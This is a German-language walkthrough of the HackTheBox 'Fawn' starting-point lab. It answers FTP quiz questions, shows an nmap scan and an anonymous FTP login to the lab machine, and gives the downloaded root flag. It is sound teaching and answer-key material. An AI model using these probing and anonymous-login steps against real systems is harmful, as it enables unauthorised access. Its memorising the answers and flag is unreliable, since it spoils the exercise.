HackTheBox WriteUp – Starting Point – Fawn

https://app.hackthebox.com/starting-point

Fawn

Task 1:
What does the 3-letter acronym FTP stand for?

Antwort 1:
File Transfer Protocol

Task 2:
Which port does the FTP service listen on usually?

Antwort 2:
21

Task 3:
What acronym is used for the secure version of FTP?

Antwort 3:
sFTP

Task 4:
What is the command we can use to send an ICMP echo request to test our connection to the target?

Antwort 4:
ping

Task 5:
From your scans, what version is FTP running on the target?

Wir versuchen uns mit dem Anonymous Account und ohne Passwort via FTP mit der Machine zu verbinden:

└─$ ftp anonymous@10.129.170.200 21
Connected to 10.129.170.200.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Antwort 5:
vsFTPd 3.0.3

Task 6:
From your scans, what OS type is running on the target?

Wir scannen die Machine mit nmap:

└─$ nmap 10.129.170.200 -sV
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-01 15:47 CET
Nmap scan report for 10.129.170.200
Host is up (0.038s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds

Antwort 6:
Unix

Task 7:
What is the command we need to run in order to display the ‚ftp‘ client help menu?

Für viele Programme ist die Hilfeseite mit dem Programmnamen und -h aubrufbar.

Antwort 7:
ftp -h

Task 8:
What is username that is used over FTP when you want to log in without having an account?

Das haben wir bereits in Task 5 verwendet. Man kann immer den Anonymous Login versuchen, dieser benötigt auch kein Passwort.

Antwort 8:
Anonymous

Task 9:
What is the response code we get for the FTP message ‚Login successful‘?

Das sehen wir, wenn wir uns via FTP verbinden. Hier der Vorgang aus Task 5:

└─$ ftp anonymous@10.129.170.200 21
Connected to 10.129.170.200.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Antwort 9:
230

Task 10:
There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.

Antwort 10:
ls

Task 11:
What is the command used to download the file we found on the FTP server?

Antwort 11:
get

Task 12:
Submit root flag

Gucken wir uns also auf dem FTP Server um und laden die flag herunter:

ftp> ls
229 Entering Extended Passive Mode (|||8389|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||33055|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |********************************************************************************************************************|    32       29.25 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.79 KiB/s)
ftp> 

Antwort 12:
035db21c881520061c53e0536e44f815